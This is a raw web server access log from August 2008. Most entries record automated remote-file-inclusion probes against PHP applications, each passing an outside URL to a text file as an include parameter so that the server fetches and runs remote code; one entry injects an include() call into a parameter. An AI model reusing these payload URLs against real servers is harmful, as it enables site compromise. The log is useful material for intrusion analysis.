217.171.66.245 - - [24/Aug/2008:00:18:41 -0500] "GET /logs/errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [24/Aug/2008:00:18:41 -0500] "GET /errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
217.171.66.245 - - [24/Aug/2008:00:18:41 -0500] "GET /logs/errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
217.171.66.245 - - [24/Aug/2008:00:20:15 -0500] "GET /errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [24/Aug/2008:00:20:15 -0500] "GET /logs/errors.php?error=http://freewebtown.com/ceasca/c.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
217.171.66.245 - - [24/Aug/2008:00:20:16 -0500] "GET /errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
217.171.66.245 - - [24/Aug/2008:00:20:16 -0500] "GET /logs/errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
217.20.113.117 - - [24/Aug/2008:00:21:06 -0500] "GET /logs/?sourcedir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 200 96470 "-""libwww-perl/5.79"
217.20.113.117 - - [24/Aug/2008:00:21:06 -0500] "GET /?sourcedir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
80.67.20.130 - - [24/Aug/2008:00:21:39 -0500] "GET /inurl:%22com_dbquery%22http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 350 "-""libwww-perl/5.808"
67.18.151.242 - - [24/Aug/2008:00:23:24 -0500] "GET /logs/?sourcedir=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 200 96470 "-""libwww-perl/5.810"
67.18.151.242 - - [24/Aug/2008:00:23:24 -0500] "GET /?sourcedir=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
202.228.204.130 - - [24/Aug/2008:00:23:48 -0500] "GET /logs/access_log.1208044800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:00:23:48 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:00:23:48 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
220.73.137.93 - - [24/Aug/2008:00:26:19 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
220.73.137.93 - - [24/Aug/2008:00:26:20 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
69.10.154.65 - - [24/Aug/2008:00:27:02 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:00:27:02 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
195.56.172.160 - - [24/Aug/2008:00:27:05 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txthttp://www.geocities.com/heru_scorpion/bug.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:27:05 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txthttp://www.geocities.com/heru_scorpion/bug.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:27:05 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txthttp://www.geocities.com/heru_scorpion/bug.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:27:06 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txthttp://www.geocities.com/heru_scorpion/bug.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
86.58.154.237 - - [24/Aug/2008:00:27:40 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:00:27:40 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
190.137.181.149 - - [24/Aug/2008:00:28:44 -0500] "GET //?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:28:49 -0500] "GET /logs/access_log.1214524800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:28:49 -0500] "GET /logs/access_log.1214524800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:28:49 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:28:49 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
190.137.181.149 - - [24/Aug/2008:00:28:49 -0500] "GET /logs/access_log.1208044800//?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:28:49 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:28:49 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
190.137.181.149 - - [24/Aug/2008:00:28:51 -0500] "GET /logs//?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 96475 "-""libwww-perl/5.805"
91.186.15.66 - - [24/Aug/2008:00:29:47 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
91.186.15.66 - - [24/Aug/2008:00:29:47 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
80.67.20.130 - - [24/Aug/2008:00:30:17 -0500] "GET /logs//appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:30:17 -0500] "GET //appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
193.207.106.54 - - [24/Aug/2008:00:31:14 -0500] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
193.207.106.54 - - [24/Aug/2008:00:31:14 -0500] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
218.189.215.153 - - [24/Aug/2008:00:32:19 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 345 "-""libwww-perl/5.805"
218.189.215.153 - - [24/Aug/2008:00:32:19 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 340 "-""libwww-perl/5.805"
80.67.20.130 - - [24/Aug/2008:00:33:16 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:33:17 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:33:20 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
213.248.62.98 - - [24/Aug/2008:00:33:38 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
213.248.62.98 - - [24/Aug/2008:00:33:38 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
208.116.1.202 - - [24/Aug/2008:00:35:21 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
208.116.1.202 - - [24/Aug/2008:00:35:21 -0500] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
208.116.1.202 - - [24/Aug/2008:00:35:21 -0500] "GET /logs/access_log.1206230400//claroline/phpbb/page_tail.php?includePath=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
80.67.20.130 - - [24/Aug/2008:00:37:25 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
195.56.172.160 - - [24/Aug/2008:00:37:47 -0500] "GET /logs/access_log.1214438400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:38:04 -0500] "GET /logs/access_log.1214438400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
70.87.240.50 - - [24/Aug/2008:00:40:32 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://leqhi.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
70.87.240.50 - - [24/Aug/2008:00:40:32 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://leqhi.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
91.186.15.66 - - [24/Aug/2008:00:42:37 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
91.186.15.66 - - [24/Aug/2008:00:42:37 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
195.12.48.41 - - [24/Aug/2008:00:45:27 -0500] "GET /logs/access_log.1214524800//include/bbs.lib.inc.php?site_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
195.12.48.41 - - [24/Aug/2008:00:45:28 -0500] "GET //include/bbs.lib.inc.php?site_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
195.12.48.41 - - [24/Aug/2008:00:45:28 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
218.189.215.153 - - [24/Aug/2008:00:45:32 -0500] "GET /logs/access_log.1214524800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 367 "-""libwww-perl/5.805"
218.189.215.153 - - [24/Aug/2008:00:45:32 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 340 "-""libwww-perl/5.805"
218.189.215.153 - - [24/Aug/2008:00:45:33 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 345 "-""libwww-perl/5.805"
190.137.181.149 - - [24/Aug/2008:00:45:52 -0500] "GET /logs//admin/classes/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
190.137.181.149 - - [24/Aug/2008:00:45:52 -0500] "GET //admin/classes/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
80.67.20.130 - - [24/Aug/2008:00:46:33 -0500] "GET /logs/access_log.1206230400//appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:46:33 -0500] "GET //appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
208.116.1.202 - - [24/Aug/2008:00:46:40 -0500] "GET /sourcedir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
208.116.1.202 - - [24/Aug/2008:00:46:40 -0500] "GET /logs/sourcedir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
195.56.172.160 - - [24/Aug/2008:00:46:50 -0500] "GET /logs/access_log.1213488000/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:46:50 -0500] "GET /logs/access_log.1213488000/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:46:50 -0500] "GET /logs/access_log.1214179200/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
195.56.172.160 - - [24/Aug/2008:00:46:50 -0500] "GET /logs/access_log.1214179200/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 379 "-""libwww-perl/5.805"
80.67.20.130 - - [24/Aug/2008:00:47:13 -0500] "GET //appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:47:14 -0500] "GET /logs//appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
93.190.137.238 - - [24/Aug/2008:00:47:22 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
93.190.137.238 - - [24/Aug/2008:00:47:22 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
190.137.181.149 - - [24/Aug/2008:00:48:12 -0500] "GET //?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
80.67.20.130 - - [24/Aug/2008:00:48:27 -0500] "GET /logs//appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:48:30 -0500] "GET //appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
208.116.1.202 - - [24/Aug/2008:00:53:59 -0500] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
208.116.1.202 - - [24/Aug/2008:00:54:00 -0500] "GET /logs/PhpLinkExchange/bits_listings.php?svr_rootP=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
208.116.1.202 - - [24/Aug/2008:00:54:56 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
208.116.1.202 - - [24/Aug/2008:00:54:56 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
12.206.23.168 - - [24/Aug/2008:00:56:04 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
12.206.23.168 - - [24/Aug/2008:00:56:04 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.67.20.130 - - [24/Aug/2008:00:56:40 -0500] "GET /logs//appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:56:41 -0500] "GET //appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:57:34 -0500] "GET /logs//appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:00:57:38 -0500] "GET //appserv/main.php?appserv_root=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
218.189.215.153 - - [24/Aug/2008:01:01:27 -0500] "GET /logs/access_log.1214438400/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 367 "-""libwww-perl/5.805"
220.73.137.93 - - [24/Aug/2008:01:02:43 -0500] "GET /logs/access_log.1214524800/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 379 "-""libwww-perl/5.79"
220.73.137.93 - - [24/Aug/2008:01:02:44 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
220.73.137.93 - - [24/Aug/2008:01:02:44 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
194.97.107.200 - - [24/Aug/2008:01:03:31 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
194.97.107.200 - - [24/Aug/2008:01:03:31 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
74.6.17.177 - - [24/Aug/2008:01:04:28 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.217 - - [24/Aug/2008:01:04:29 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.149.232.117 - - [24/Aug/2008:01:05:36 -0500] "GET /logs/access_log.1214179200/htmltonuke.php?filnavn=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
62.149.232.117 - - [24/Aug/2008:01:05:36 -0500] "GET /htmltonuke.php?filnavn=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
62.149.232.117 - - [24/Aug/2008:01:05:36 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
74.6.8.121 - - [24/Aug/2008:01:06:29 -0500] "GET /artwork/banners.htm HTTP/1.0" 200 3537 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.149.232.117 - - [24/Aug/2008:01:07:00 -0500] "GET /logs/access_log.1214438400/htmltonuke.php?filnavn=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
80.67.20.130 - - [24/Aug/2008:01:07:20 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
80.67.20.130 - - [24/Aug/2008:01:07:20 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
62.149.232.117 - - [24/Aug/2008:01:07:53 -0500] "GET /logs/access_log.1214179200%20/htmltonuke.php?filnavn=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
65.254.49.34 - - [24/Aug/2008:01:08:18 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:08:18 -0500] "GET //?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:08:31 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:08:32 -0500] "GET //?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:01:08:32 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.810"
80.67.20.130 - - [24/Aug/2008:01:09:38 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
72.5.54.215 - - [24/Aug/2008:01:10:17 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:10:17 -0500] "GET //?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:10:18 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:10:21 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:10:21 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:10:22 -0500] "GET //?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:10:22 -0500] "GET //?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:10:22 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:01:10:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.65"
216.246.45.200 - - [24/Aug/2008:01:11:31 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:11:31 -0500] "GET //?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:11:31 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:11:32 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:11:33 -0500] "GET //?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
216.246.45.200 - - [24/Aug/2008:01:11:33 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.810"
